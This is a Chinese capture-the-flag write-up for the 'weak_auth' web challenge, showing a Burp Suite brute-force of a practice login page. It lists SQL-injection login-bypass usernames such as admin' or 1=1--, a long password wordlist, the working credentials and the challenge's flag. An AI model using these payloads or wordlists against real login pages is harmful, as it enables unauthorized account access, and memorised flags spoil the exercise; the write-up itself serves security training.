【愚公系列】2021年12月 攻防世界-简单题-WEB-006(weak_auth)
【摘要】 一、weak_auth题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 二、使用步骤 1.点击获取在线场景 2.进入网站是个登录页面 3.Burpsuit爆破密码字典用户名adminadmin'--admin' or ''=''--admin' or 1=1--'or 1=1--...
一、weak_auth
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1
二、使用步骤
1.点击获取在线场景
2.进入网站是个登录页面
3.Burpsuit爆破
密码字典
用户名
admin
admin'--
admin' or ''=''--
admin' or 1=1--
'or 1=1--
密码
admin
admin12
admin888
admin8
admin123
sysadmin
adminxxx
adminx
6kadmin
base
feitium
admins
root
roots
test
test1
test123
test2
password
aaaAAA111
888888
88888888
000000
00000000
111111
11111111
aaaaaa
aaaaaaaa
135246
135246789
123456
654321
12345
54321
123456789
1234567890
0
123qwe
123qweasd
5710195
571181
5712088
5722257
57631018
57666
5802768
5807836
58108243
58109747
58138281
5814
5814442
581525
5818983
582838
5829
5839
5841321
58434
58435738
58443091
58460532
585800
585858
58605860
58658
58745621
781031
781102
781104
781105
781107
781108
78111
781111
781112
781113
781115
781119
781122
781123
781127
781128
781129
781130
781153
7812
781202
781205
781211
781212
781213
781215
781218
781220
781223
781229
781231
781729
78210zyn
782119
7821zj
7825
783600
7839596
784002
7841224
785427
7859
78615
78627
787076
787166
7877637
78784545
7882
788383
788c
78909
78912
78913
789456
78o5sljx
790101
790109
790110
790115
790128
790203
790209
790211
790220
790221
790223
790228
790301
790302
790305
790313
790315
790317
790322
790324
790325
790329
790404
790420
790505
790510
790603
790606
790612
790612001
790616
790617
790623
790624
790706
790720
790731
790802zl
790821
790824
790825
790827
790831
790908
790925
790929
791005
791007
791008
791016
791017
7910195
791022
791024
791027
791030
791090
791103
791105
791109
791110
791112
791114
791116
791118
791119
791122
791123
791124
791126
791129
791130
791133
7911365
791160
791204
791212
791219
791219.8
791220
791222
791224
7913
791910
792110
79223
7923
792643
792713
793201
7952
79730
7976n
7980
798503
799625
799700
7998585
7s0331
7tbza1k4
8001
800102
800113
800117
800118
800118ab
800125
800207
800219
800225
800227
800300
800309
800410
800411
800502
800509
800511
80051604
800526
800530
800620
800623
800630
800702
800706
800711
800716
800801
800817
800822
800831
80086
800902
800920
800922
800926
801007
801008
801009
801015
801016
801019
801023
801025
8010270
801028
801105
801106
801109
801111
801113
801118
8.01E+11
801119
801125
801167
801205
801210
801212
801218
801219
801225
801226
80130
80131
8017
8018
80181879
80190715
802110
8023
802630
8031
803362
80410
80455323
80519
805488
8061
80626
806669
8080
8081963
8084
8090402
809800
810000
810117
810124
8101250
810127
810202
810205
810206
810208
810209
810216
810221
810312
810321
810402
810419
810427
810506
810602
810605
810616
810621
810630
810715
810725
810818
810829
810906
810915
810917
810921
810924
810929
81094888
811007
811021
811031
811108
811110
811116
811123
811124
811128
811129
811137
81116
811205
811212
811217
811222
811223
811231
811537
8120726
81211
812206
8128746
8142578
81627
8168
817230
817877
8179
81890
819103-a
81917621
81927
820108
820122
820209
820303
820319
8203433
820416
820419
820530
820603
820604
820612
820622
820703
820722
820807
820904
820917
820926
8210
821015
821019
821108
821129
821201
8221688
8221945
822995
82310
824623
825528
827046
827913
82820
828203
8283515
828384
828522
828589
828828
830101
8301889
830401
830424
830614
830619
830654
830718
830820
830824
830830
830920
830929
831005
83108
831127
831210
831227
831831
83227
8327265
832875
833420
833547
8341
835283
83598026
8360784
8369611
83720
8377
838400
84037123
840804
841113
841219
8420569
842191
8430804
8462583
8482
8492401
850269
851017
851117
8512
852222
8536918
853885
854093
8564366
859076
8597680
860340
8609994
861027
8622436
8623
862302
8630
86365603
864055
864763
86513103
86517511
8659522
86603
866272
867135
86735576
86899379
868mxw
870309
8703151
8730369
8732
8736
876543
8770812281
878654
8792679
879302
880218
88023614
880411
8804789
8818320
88188
881985
882300
883226
8834847
884000
884285
8848
88565966
885853
886868
88733669
8874456
887mmn
8888
888888
88888888
8888888888
8892855
8894
8894602
88988
890098
890731
891031
891901
8947
895400
89548954
898988
8;hm<#eq
90055
9008
900990
901111
9022029
9026
9047
905504
9064
9069
907004
9090
90909090
909727
910228
9110
911017
911116
911187
911478
91162
9123
913823
91508
915162
9170
917027
9182
918918
919393
91991132
920818
9210
922917
923212
924217
925138
9261212
9267
926928
9280
928097
928714
92878
92927
930025
930108
930119
930225
930413
9305041
930511
930705
930716
9310213
931124
934112
935136
936025
936566
9379
9393
940066
940151859
940373
940475
940507
940610
940812
941117
941190
94124
941533
9416031
9421004
9424
进行破解
用admin和123456登录即可拿到flag:
flag为:cyberpeace{4a03c0590be06fd59137291efc1f0df1}
总结
- Burpsuit 暴力破解
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)